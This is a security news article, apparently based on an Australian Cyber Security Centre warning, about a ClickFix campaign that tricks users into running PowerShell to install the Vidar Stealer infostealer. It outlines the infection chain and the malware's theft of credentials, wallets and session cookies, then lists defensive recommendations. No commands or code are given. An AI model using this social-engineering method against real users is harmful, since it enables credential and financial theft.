Vidar Stealer Surges: How ClickFix Social Engineering Targets Australian Networks

The Australian Cyber Security Centre (ACSC) has issued a fresh warning to organizations about an active malware campaign that leverages the ClickFix social engineering technique to deploy Vidar Stealer, a sophisticated information-stealing malware. This campaign poses a significant threat to businesses and government agencies across Australia, with the potential to compromise sensitive data, financial accounts, and credentials.

Campaign Overview

The ACSC first detected the uptick in activity in late 2024 and continues to monitor the threat. Attackers are using the ClickFix method to trick users into running malicious commands that install Vidar Stealer on Windows systems. The malware is disguised as a troubleshooting tool or a browser update, luring victims with fake error messages that prompt immediate action.

Vidar Stealer Surges: How ClickFix Social Engineering Targets Australian Networks — Source: www.bleepingcomputer.com

What Is ClickFix?

ClickFix is a social engineering technique that presents users with a fake error notification or warning, often mimicking legitimate software alerts. The error message instructs the user to press a key combination (such as Windows + R) or click a button to "fix" the issue. Once the victim follows the instructions, they inadvertently execute a malicious script that downloads and runs the Vidar Stealer payload.

This technique exploits the user's trust in system alerts and their urgency to resolve perceived problems. Unlike traditional phishing that relies on email links or attachments, ClickFix operates entirely within the current browser session, making it harder for many security tools to detect.

Vidar Stealer Capabilities

Vidar Stealer is a commodity infostealer sold on underground forums and commonly used in targeted and opportunistic attacks. Once installed, it performs the following actions:

Credential theft: Extracts saved passwords from browsers, email clients, and FTP applications.
Cryptocurrency wallet harvesting: Identifies and exfiltrates wallet files and private keys from popular wallets like Bitcoin Core, Electrum, and Exodus.
Session hijacking: Steals cookies and session tokens to bypass multi-factor authentication.
Screenshot capture: Takes screenshots of the active desktop to steal visible data.
Data exfiltration: Compresses stolen data and sends it to command-and-control (C2) servers.

Data Targeted in This Campaign

According to the ACSC, the current Vidar variant specifically targets browser stored credentials, autofill data, and cryptocurrency wallet information. Attackers also harvest system information including computer name, installed software, and user locale to tailor further attacks. The stolen data is often sold on dark web markets or used for account takeover and financial fraud.

Infection Chain: How the Attack Unfolds

The attack begins with a compromised website or a malvertising campaign. When a user visits the infected site, they see a pop-up resembling a legitimate browser error or a notification that says "Your browser is out of date" or "Hardware failure detected."

The pop-up instructs the victim to copy a PowerShell command or press a specific key sequence.
If the user follows the instruction, they run a script that downloads the Vidar Stealer executable from a remote server.
The executable executes silently, often bypassing User Account Control (UAC) prompts by using signed binaries or DLL sideloading.
Vidar collects data and sends it to a C2 server controlled by the threat actor.

The entire process can occur in seconds, with no further user interaction required after the initial click. Because the script is run from the clipboard or a keyboard shortcut, traditional scanning tools that monitor file downloads may not flag it.

ACSC Recommendations for Organizations

The ACSC has provided several practical steps to mitigate the risk of ClickFix attacks and Vidar Stealer infections:

Restrict PowerShell usage: Implement Group Policy to block PowerShell execution for non-administrative users or enable constrained language mode.
Enable application whitelisting: Use tools like Microsoft AppLocker or Windows Defender Application Control to prevent unauthorized executables.
Educate users: Train staff to recognize fake error messages and to never run commands from pop-ups or untrusted sources.
Deploy endpoint detection and response (EDR): Use EDR solutions that can monitor for suspicious script execution and process injection.
Update software: Keep browsers and operating systems patched to close vulnerabilities that may be exploited to serve malicious pop-ups.
Implement network segmentation: Limit the lateral movement of malware by isolating critical systems from user workstations.

Conclusion

The ClickFix campaign distributing Vidar Stealer is a clear example of how social engineering continues to evolve, even as technical defenses improve. Organizations in Australia and elsewhere must remain vigilant, particularly when it comes to user behavior and script execution policies. The ACSC will continue to update its advisories as new information emerges. Immediate implementation of the recommended controls can significantly reduce the risk of data breach and financial loss.